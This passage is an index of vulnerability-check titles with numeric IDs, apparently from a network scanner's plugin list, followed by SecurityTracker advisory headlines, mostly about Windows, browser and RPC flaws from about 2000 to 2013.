Vulnerabilities-03 oct12 (Windows) [802480] VLC Media Player TiVo Demuxer Double Free Vulnerability (Windows) [802479] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-02 oct12 (Windows) [802478] Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct (Windows) [802473] Google Chrome Multiple Vulnerabilities-02 Oct12 (Windows) [802470] Google Chrome Multiple Vulnerabilities-01 Oct12 (Windows) [802468] Compatibility Issues Affecting Signed Microsoft Binaries (2749655) [802462] Microsoft ActiveSync Null Pointer Dereference Denial Of Service Vulnerability [802451] Google Chrome Multiple Vulnerabilities - Sep12 (Windows) [802450] Opera Address Bar Spoofing Vulnerability (Windows) [802444] XnView Multiple Image Decompression Heap Overflow Vulnerabilities (Windows) [802443] XnView PSD Record Type Parsing Integer Overflow Vulnerabilities (Windows) [802435] Opera 'X.509' Certificates Spoofing Vulnerability (Windows) [802420] VLC Media Player '.amr' File Denial of Service Vulnerability (Windows) [802403] MS Windows Fraudulent Digital Certificates Spoofing Vulnerability (2641690) [802398] Adobe Shockwave Player Multiple Vulnerabilities - Feb 2012 (Windows) [802395] Opera Large Integer Argument Denial of Service Vulnerability (Windows) [802374] Google Chrome Multiple Denial of Service Vulnerabilities - January12 (Windows) [802365] Opera Cache History Information Disclosure Vulnerability (Windows) [802363] Opera Multiple Information Disclosure Vulnerabilities (Windows) [802361] Opera Multiple Vulnerabilities - December11 (Windows) [802358] Google Chrome Cache History Information Disclosure Vulnerabilities (Windows) [802355] Google Chrome Multiple Information Disclosure Vulnerabilities (Windows) [802349] PHP EXIF Header Denial of Service Vulnerability (Windows) [802345] Google Chrome Multiple Vulnerabilities - November11 (Windows) [802343] ChaSen Buffer Overflow Vulnerability (Windows) [802340] EtherApe RPC Packet Processing Denial of Service Vulnerability [802338] Google Chrome Mozilla Network Security Services Privilege Escalation Vulnerability (Windows) [802332] Opera Extended Validation Information Disclosure Vulnerabilities (Windows) [802330] PHP Multiple Vulnerabilities (Windows) - Sep 2011 [802326] Google Chrome multiple vulnerabilities - September11 (Windows) [802316] Google Chrome Multiple Vulnerabilities - August11 (Windows) [802314] Ecava IntegraXor Multiple Cross-Site Scripting Vulnerabilities (Windows) [802313] Google Picasa JPEG Image Processing Remote Code Execution Vulnerability (Windows) [802309] XnView File Search Path Executable File Injection Vulnerability (Windows) [802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows) [802300] Tor Directory Authority 'policy_summarize' Denial of Service Vulnerability (Windows) [802292] IBM Informix Dynamic Server 'oninit.exe' Buffer Overflow Vulnerability (Windows) [802287] Microsoft Internet Explorer Cache Objects History Information Disclosure Vulnerability [802286] Microsoft Internet Explorer Multiple Information Disclosure Vulnerabilities [802284] Apple Safari JavaScript Implementation Information Disclosure Vulnerability (Windows) [802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows) [802278] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802277] Oracle Java SE Java Runtime Environment Unspecified Vulnerability - October 2011 (Windows) [802276] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows04) [802275] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows03) [802274] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows02) [802273] Oracle Java SE Multiple Vulnerabilities - October 2011 (Windows01) [802262] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802255] Google Chrome Multiple Vulnerabilities - October11 (Windows) [802249] Wireshark Lua Script File Arbitrary Code Execution Vulnerability (Windows) [802248] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802237] Apple Safari Secure Cookie Security Bypass Vulnerability (Windows) [802227] IBM Lotus Symphony Multiple Vulnerabilities (Windows) [802219] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 04 [802218] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 03 [802217] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 02 [802216] Mozilla Products Multiple Vulnerabilities July-11 (Windows) - 01 [802215] Mozilla Firefox Security Bypass Vulnerability July-11 (Windows) [802214] Mozilla Products Multiple Denial of Service Vulnerabilities July-11 (Windows) [802213] Mozilla Products Multiple Vulnerabilities July-11 (Windows) [802212] Mozilla Firefox Multiple Vulnerabilities July-11 (Windows) [802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows) [802206] Adobe Products Unspecified Cross-Site Scripting Vulnerability June-2011 (Windows) [802203] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802202] Microsoft Internet Explorer Cookie Hijacking Vulnerability [802201] Wireshark 'bytes_repr_len' Function Denial of Service Vulnerability (Windows) [802200] Wireshark Multiple Denial of Service Vulnerabilities (Windows) [802198] Apple QuickTime Multiple Denial of Service Vulnerabilities - (Windows) [802175] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows 01) [802174] Mozilla Products Enter Key Dialog Bypass and Use-After-Free Memory Corruption Vulnerabilities (Windows) [802173] Mozilla Products 'YARR' Code Execution Vulnerability (Windows) [802172] Mozilla Products Same Origin Policy Bypass Vulnerability (Windows) [802171] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities (Windows) [802170] Mozilla Firefox Memory Corruption and Integer Underflow Vulnerabilities (Windows) [802169] Mozilla Products Multiple Vulnerabilities - Oct 2011 (Windows) [802166] Adobe Reader and Acrobat Multiple Vulnerabilities September-2011 (Windows) [802165] Adobe Reader Unspecified Vulnerability (Windows) [802163] Calendar Manager Service rpc.cmsd Service Detection [802153] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802152] Mozilla Products Information Disclosure and Security Bypass Vulnerabilities (Windows) [802151] Mozilla Products Multiple Vulnerabilities - Sep 11 (Windows) [802150] Mozilla Products Multiple Vulnerabilities (Windows) [802149] Mozilla Firefox Untrusted Search Path Vulnerability (Windows) [802147] Mozilla Products 'SVG' Code Execution Vulnerability (Windows) [802141] Opera 'HTTPS-Session' Multiple Vulnerabilities (Windows) [802138] Mozilla Firefox Multiple Vulnerabilities August-11 (Windows) [802137] Nfs-utils rpc.rquotad Service Detection [802133] Apple QuickTime Multiple Buffer Overflow Vulnerabilities (Windows) [802126] Google Chrome 'GetWidget' methods DoS Vulnerability (Windows) [802119] VLC Media Player 'AMV' Denial of Service Vulnerability (Windows) [802113] Opera Browser 'SRC' Denial of Service Vulnerability (Windows) [802112] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802111] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802110] Adobe Reader and Acrobat Multiple BOF Vulnerabilities June-2011 (Windows) [802107] Opera Browser Multiple Vulnerabilities Jul-11 (Windows) [802102] Google Chrome Multiple Vulnerabilities - June 11(Windows) [802100] Mozilla Firefox SSL Certificate Spoofing Vulnerability (Windows) [801951] Novell iPrint Client 'printer-url' Multiple BOF Vulnerabilities (Windows) [801937] IBM solidDB RPC Test Commands Denial of Service Vulnerabilities [801935] Microsoft Silverlight Multiple Memory Leak Vulnerabilities [801934] Microsoft Silverlight Version Detection [801921] Adobe Products Arbitrary Code Execution Vulnerability (Windows) [801905] Mozilla Products Browser Engine Multiple Unspecified Vulnerabilities March-11 (Windows) [801904] Mozilla Products Buffer Overflow Vulnerability March-11 (Windows) [801903] Mozilla Products Multiple Unspecified Vulnerabilities March-11 (Windows) [801902] Mozilla Products Multiple Vulnerabilities March-11 (Windows) [801898] TigerVNC SSL Certificate Validation Security Bypass Vulnerability (Windows) [801897] TigerVNC Version Detection (Windows) [801890] Google Chrome Multiple Denial of Service Vulnerabilities - May11 (Windows) [801887] Mozilla Products Unspecified Vulnerability May-11 (Windows) [801886] Mozilla Firefox Multiple Unspecified Vulnerabilities May-11 (Windows) [801885] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801712] Vulnerability in RPC Could Allow Denial of Service (933729) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) [801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801034] Wireshark 'DCERPC/NT' Dissector DOS Vulnerability - Nov09 (Win) [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100798] MailEnable 'MESMTRPC.exe' SMTP Service Multiple Remote Denial of Service Vulnerabilities [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100529] PHP xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80036] rpc.ypupdated remote execution [80034] irix rpc.passwd overflow [80029] rpc.nisd overflow [80007] Microsoft MS00-06 security check [65954] SLES10: Security update for librpcsecgss [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [58670] Debian Security Advisory DSA 1387-1 (librpcsecgss) [58588] Debian Security Advisory DSA 1368-1 (librpcsecgss) [55127] Gentoo Security Advisory GLSA 200508-13 (pear-xml_rpc phpxmlrpc) [55050] FreeBSD Ports: pear-XML_RPC [54977] Gentoo Security Advisory GLSA 200507-01 (pear-xml_rpc phpxmlrpc) [54206] FreeBSD Ports: pear-XML_RPC [53990] FreeBSD Ports: pear-XML_RPC [53957] Slackware Advisory SSA:2005-111-02 Python SimpleXMLRPCServer module [53601] Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc) [53163] Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus) [53114] Debian Security Advisory DSA 417-1 (kernel-patch-2.4.18-powerpc, kernel-image-2.4.18-1-alpha) [20377] Windows Server Update Services detection [15467] Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350) [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11418] Sun rpc.cmsd overflow [11340] SSH Secure-RPC Weak Encrypted Authentication [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11159] MS RPC Services null pointer reference DoS [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11111] rpcinfo -p [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10763] Detect the HTTP RPC endpoint mapper [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running [2497] IBM Lotus Domino Notes RPC Authentication Processing Denial of Service Vulnerability SecurityTracker - https://www.securitytracker.com: [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1028906] Windows RPC Bug Lets Local Users Gain Elevated Privileges [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute 